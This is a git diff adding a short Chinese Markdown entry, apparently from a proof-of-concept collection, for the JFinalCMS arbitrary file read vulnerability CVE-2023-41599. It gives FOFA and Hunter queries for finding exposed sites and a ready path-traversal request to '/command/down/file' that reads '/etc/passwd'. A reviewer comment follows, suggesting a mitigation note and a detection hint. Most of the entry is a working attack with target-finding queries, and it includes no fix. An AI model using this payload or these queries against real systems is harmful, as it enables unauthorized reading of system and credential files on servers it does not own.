diff --git a/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md new file mode 100644 index 0000000..cea75be --- /dev/null +++ b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md @@ -0,0 +1,23 @@ +## JFinalCMS 任意文件读取漏洞(CVE-2023-41599) + + +## 特征 +```fofa: + +body="content=\"JreCms" + +hunter: + +web.body="content=\"JreCms" +``` +## POC +``` +Windows: /../../../../../../../../../test.txt +Linux: /../../../../../../../../../etc/passwd + +/command/down/file?filekey=/../../../../../../../../../etc/passwd +``` + + +## 漏洞分析 +http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
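Review bot: the opening code fence in the 特征 section has `fofa:` on the same line as the fence, so it is parsed as the fence's language tag and the FOFA label will not render; move `fofa:` to its own line inside the block, matching how `hunter:` is written. In the POC block the Windows and Linux path values come before the request they belong to; put the `/command/down/file?filekey=` line first and say that the two values are what is supplied in `filekey`. The entry also gives no affected version, fix or mitigation, and the 漏洞分析 section is only an external `http://` link; add a short summary of the cause and a detection hint (requests to `/command/down/file` whose `filekey` contains `../` sequences) so the entry stays useful if the link goes away.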